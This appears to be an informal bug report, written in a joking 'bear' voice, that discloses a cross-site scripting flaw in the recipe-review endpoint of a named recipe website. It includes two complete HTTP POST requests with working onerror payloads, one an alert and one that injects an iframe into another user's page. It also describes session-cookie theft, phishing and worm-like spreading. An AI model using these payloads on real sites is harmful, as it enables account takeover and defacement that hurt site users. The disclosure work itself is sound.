greetings, its bear.
I found a very scary vulnerability.
What can happen if bad guy finds it:
ddos
xss (leak session id)
html defacement
any javascript execution on user browser
malicious iframe (phishing, clickjacking, more scary stuff)
even more scary stuff
The exploit:
By sending this specific http post request
POST /recipe/review HTTP/2
Host: www.recipow.com
Cookie: _ga=GA1.1.58669917.1689302410; sessionId=; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 98
Sec-Ch-Ua:
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror=alert(1)>bb"}
There is an xss attack <img src/onerror=alert(1)>bb. This can be used to steal the session id cookie and log in as other users. :(((
This is because the user is allowed to change the input which is directly reflected into the html (very unsafe and scary!!)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Here is an example of executing javascript (also allowing for potentially malicious iframes)
POST /recipe/review HTTP/2
Host: www.recipow.com
Cookie: _ga=GA1.1.58669917.1689302410; sessionId=dwadawda33t14; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 597
Sec-Ch-Ua:
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror="var youtubeIframe = document.createElement('iframe');youtubeIframe.width = '560';youtubeIframe.height = '315';youtubeIframe.src = 'https://www.youtube.com/embed/yMDOin3yWhU';youtubeIframe.title = 'YouTube video player';youtubeIframe.frameBorder = '0';youtubeIframe.allow = 'accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share';youtubeIframe.allowFullscreen = true;document.getElementsByClassName('w-full my-12')[0].appendChild(youtubeIframe);">clickme"}
This code imbeads an iframe into another user's recipie page that shows a youtube video of bears. Remember this can be used to create a fishing page or show other content or deface the website or do many other things. Many other scary things!!! (cryptomining?)
i think you got the idea by now. You can also use this javascript to force all visitors to create new recipies with hundreds of images and send xss attacks from the victims browsers and it can be very bad. Very scary.
Summary:
Exploit allows any user to abuse reflected xss to execute javascript on a victim browser. (very scary)